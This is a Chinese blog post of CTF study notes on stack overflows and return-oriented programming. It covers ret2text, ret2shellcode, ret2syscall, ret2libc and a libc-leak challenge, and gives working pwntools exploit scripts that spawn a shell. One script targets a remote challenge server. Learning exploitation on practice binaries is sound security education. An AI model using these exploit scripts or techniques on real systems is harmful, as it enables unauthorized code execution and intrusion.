学习栈记记笔记

最新推荐文章于 2022-12-04 20:21:24 发布
最新推荐文章于 2022-12-04 20:21:24 发布
阅读量403 收藏
点赞数
分类专栏: 学习笔记 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pppp974/article/details/92018830
版权

栈的主要寄存器

主要有三个ebp,eip,esp,eip存放下一步要运行的指令的地址,ebp为帧基指针,可以理解为指向栈里面最高的地址,esp则可以理解为指向站里面最低的地址。

栈的分布

存放注意:上方是高地址,下方是低地址。
注意:上方是高地址,下方是低地址。

存入栈的顺序

栈由高位置生长向低位置,所以由图就可以看到

实参N~1→主调函数返回地址→主调函数帧基指针EBP→被调函数局部变量1~N

对于平时做题就可以有一个简化版的图

此图中输入字符串距离ebp为14个字节,下方为低地址,上方为高地址。

经常被攻击的函数

在这里插入图片描述
在这里插入图片描述

常见攻击方法rop

在这里插入图片描述

ret2text

此题见于ctf-wiki,总结一下关键点,构造payload ret2‘system(bin/sh)’,关键是算偏移量,此处算相对ebp的偏移量利用的是相对esp的偏移量。
在这里插入图片描述
在这里插入图片描述
从这两个图可以看出,s的相对于esp的位置为80h-64h=1c,然后通过gdb算esp与ebp的相对偏移,就可以计算出s相对于ebp的偏移位置了。
用gdb将断点下在call gets
在这里插入图片描述
就算出esp相对于ebp的偏移为88h,所以s相对于ebp的位置就为88h-1c=6c,再加上为32位的文件,payload就构造出来了,最终脚本
在这里插入图片描述

ret2shellcode

在这里插入图片描述
从主函数可以看到gets之后又复制了一次到bss段,程序中也没有system和bin/sh,就要自己构造一个shellcode放入bss段中然后通过执行Bss段来执行。
偏移算法参照上题,为112,找到bss段地址,用pwntools构造shellcode,代码如下。
在这里插入图片描述

ret2syscall

在这里插入图片描述
此题没有system调用,只有binsh的字符串,然后思路就是利用系统调用来调用system,需要eax=0xb,ebx=address(bin/sh),ecx=0,edx=0,最后进行Int0x80,就可以调用了,由于gets有栈溢出,只需要一直return每一个pop,exx,然后输入对应的值,最后返回int0x80即可。
找这些pop就需要用到ROPgadget工具了,命令行如下

ROPgadget --binary rop --only 'pop|ret' | grep 'eax'
ROPgadget --binary rop  --only 'int'

最后的exp放一下

from pwn import *
sh = process('./rop')
pop_eax=0x080bb196
pop_edx_ecx_ebx=0x0806eb90
binsh=0x080BE408
int80=0x08049421
payload = flat(['a'*112,p32(pop_eax),0xb,p32(pop_edx_ecx_ebx),0,0,binsh,int80])
sh.sendline(payload)
sh.interactive()

ret2libc1

在这里插入图片描述
此题可以查到system和binsh都有,查到地址后,直接栈溢出返回调用,代码如下

from pwn import *
sh = process('./ret2libc1')
system=0x08048460
binsh=0x08048720
payload = flat(['a'*112,p32(system),'aaaa',p32(binsh)])
sh.sendline(payload)
sh.interactive()

level3

此题既无system也无/bin/sh,所以就需要自己利用动态链接库计算真实地址。
在这里插入图片描述
此处存在一个栈溢出,偏移量为88h+4,此处选择泄露write_got(由于在read执行前,就执行了write了,就保存了write_got了),然后算出system和/bin/sh的地址即可,代码如下。

from pwn import *
from LibcSearcher import * 

p=remote('111.198.29.45',55393)
elf=ELF('./level3')
write_plt=elf.plt['write']
write_got=elf.got['write']
vulnerable_add=0x0804844b
payload=flat(['a'*140,p32(write_plt),p32(vulnerable_add),p32(1),p32(write_got),p32(4)])
p.recv()
p.sendline(payload)
write_add=u32(p.recv(4))
libc=LibcSearcher('write',write_add)
libcbase=write_add-libc.dump('write')
system=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
payload1=flat(['a'*140,p32(system),p32(0xdeadbeef),p32(bin_sh)])
p.sendline(payload1)
p.interactive()

64位

寄存器

%rax 作为函数返回值使用。
%rsp 栈指针寄存器,指向栈顶,最低位置
%rdi,%rsi,%rdx,%rcx,%r8,%r9 用作函数参数,依次对应第1参数,第2参数。。。
%rbx,%rbp,%r12,%r13,%14,%15 用作数据存储,遵循被调用者使用规则,简单说就是随便用,
调用子函数之前要备份它,以防他被修改
%r10,%r11 用作数据存储,遵循调用者使用规则,简单说就是使用之前要先保存原值

PS:参考了ctf-wiki的内容。ctf-wiki

gone too soon
关注
专栏目录
栈(学习笔记)
qq_43986343的博客
08-02 570
栈的学习笔记
数据结构学习笔记 ---- 栈
xinran0703的专栏
07-24 634
1.1 栈和队的基本概念 1.1.1 栈的基本概念 栈的定义 栈是只能在一段进行数据插入和删除的线性表。允许进行数据插入和删除的一端称为栈顶(top),栈顶由一个成为栈顶指针的位置指示器来表示,是动态变化的。表的另一端成为栈底,是固定不变的。插入数据和删除数据被称为入栈和出栈。 2. 栈的特点 栈的特点是先进后出。栈的数据形态就好比是叠放成一列的盘子,最先...
关于栈的学习
continue841的博客
12-04 497
栈的顺序和链式存储
栈的学习(1)
王小东大将军的博客
05-15 268
1、栈内存操作系统来分配和释放;堆内存由程序员自己来分配和释放; 2、栈有系统自动分配,只要栈剩余空间大于所申请空间,系统将为程序提供内存,否则将报异常提示栈溢出。 3、栈的空间有限,对堆有很大的自由存储区;   栈的大小是固定的,堆的大小受限于系统中有效的虚拟内存。 “堆的使用容易产生碎片“是因为垃圾回收容易导致堆产生碎片。
栈的简单学习
vengeance的博客
10-21 173
栈什么是栈:栈是一种有序数据项构成的数据结构,数据项的插入和删除只能在一端(栈顶)进行。LIFO(last in first out)。这里分别用数组和链表简单实现栈的功能。1.用数组实现栈,元素array[0]就表示了栈底元素,array.length表示了栈的长度,array[array.length-1]表示了栈顶元素。每次有元素入栈的时候,array.length++ public Arr
学习栈,这一篇就足够了
忘忧的博客
03-15 780
每天最幸福的事情,莫过于下班回家后,踏进厨房,做上一道自己喜欢的菜肴,然后饱餐一顿。起锅,烧油,葱姜蒜……一顿操作猛如虎,一顿美味要出炉。打开放厨具的柜子,从一摞碗当中拿出了最上边的一个,将饭菜盛出,开始饕餮大餐。 今天要讲的数据结构,就是这一摞碗——栈。 什么是栈 栈和队列有着相似之处,两者都是受着一定规则约束的线性数据结构,不同的是,队列遵循的是先进先出(FIFO)的规则,而栈坚持着后来者居...
栈和队列学习
qq_43540087的博客
10-27 364
栈的定义: 栈是限定只在表尾进行插入和删除操作的线性表。 理解栈的定义的注意点: (1)首先它是一个线性表,栈元素具有线性关系,即前驱后继关系。 (2)它的特殊之处在于限制了这个线性表的插入和删除位置,它始终只在栈顶进行。 (3)栈的插入操作,叫做进栈。 (4)栈的删除操作,叫做出栈。 栈和普通线性表的不同点: 栈是特殊的线性表,是只允许在一端进行插入和删除操作的线性表。允许插入和删除的叫栈顶,反...
Java学习笔记(要点记录)
03-23
Java学习笔记中涵盖了多个关键知识点,以下是对这些内容的详细解释: 1. **数组定义**:在Java中,数组是一种存储固定数量同类型数据的集合。整形数组如`int[] array = new int[needSize]`,字符串数组如`String[] ...
程序员面试学习笔记以及相关经验记录
11-16
"程序员面试学习笔记以及相关经验记录"这个资料集合,无疑为准备面试的程序员提供了一份宝贵的参考资料。这份名为"noteTest-master"的压缩包文件很可能包含了面试准备的各种要素,包括但不限于常见面试题、解题思路...
移动开发笔记:记录一下移动开发学习
02-25
每种平台都有其特定的技术栈和最佳实践,开发者需要不断学习和适应,才能在这个领域取得成功。通过阅读和理解这些笔记,你将能够深入掌握移动开发的基础知识,为进一步的学习和实践打下坚实基础。
记录一些自己学习MySQL,JUC,JVM的学习笔记.zip
02-23
MySQL是世界上最受欢迎的关系型数据库管理系统之一,用于存储和管理数据。...通过这些笔记,你可以系统地学习和理解MySQL数据库、Java并发编程以及JVM的运作机制,为你的软件开发职业生涯打下坚实的基础。
编程笔记:自分の学习を记录
02-12
通过阅读这些文件,我们可以更深入地了解作者学习的具体技术栈和进度。 为了充分利用这些笔记,建议按照以下步骤进行: 1. **阅读README**:了解笔记的整体结构、目的和使用指南。 2. **浏览文件结构**:识别不同...
数据结构与算法——栈与队列(一) 学习笔记
提小莫的寂寥的博客
02-29 406
最近正在学清华大学的那门DSA,从现在开始就把学习笔记,以及过程中感悟、遇到的问题、解决方法都记录在博客里。就从今天学习的开始记录吧,之前用word记录的学习笔记后面有时间再慢慢往博客上面搬 一、栈 ADT接口 栈,stack,线性序列,但只能访问栈中的特定元素(栈的一端),其中开放的一端称为栈顶(top),不开放的另一端称为栈底(bottom)。 三个基本操作 入栈——将元素作为最顶部的元素插入...
c语言 栈结构存放数据类型,数据结构——栈的详解
weixin_29791743的博客
05-22 2355
栈和队列是两种重要的线性结构,从数据结构的角度看,栈和队列也是线性表,其特殊性在于栈和队列的基本操作是线性表的子集。他们是操作受限的线性表,因此,可称为限定性的数据结构。但从数据类型角度看,他们是和线性表大不相同的两类重要的的抽象数据类型。文章目录C语言中的栈栈的定义C语言中栈的基本操作栈的初始化判断是否为空栈判断是否为满栈入栈出栈C语言实现栈的具体代码C++中的栈C++中栈的基本操作初始化判断是...
report ETL .ffff
09-17
report ETL .ffff
基于ssm的共享充电宝管理系统设计与实现.docx
09-17
基于ssm的共享充电宝管理系统设计与实现.docx
操作系统大作业_Linux_命令行_OSWork.zip
最新发布
09-17
操作系统大作业_Linux_命令行_OSWork
Java项目-基于SSM+Jsp的社区管理与服务系统的设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件)
09-17
【基于SSM+Jsp的社区管理与服务系统的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于SSM+Jsp的社区管理与服务系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行!
吉他谱_Show Me How To Live - Audioslave.pdf
09-17
初级入门吉他谱 guitar tab
JVM学习笔记:类加载子系统详解
"JVM类加载子系统的学习笔记,包括内存结构概述、类加载器和加载过程的详细解析。" 在Java虚拟机(JVM)中,类加载子系统是程序运行的基础,它负责将类的.class文件加载到内存中,以便程序能够执行。这篇学习笔记...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值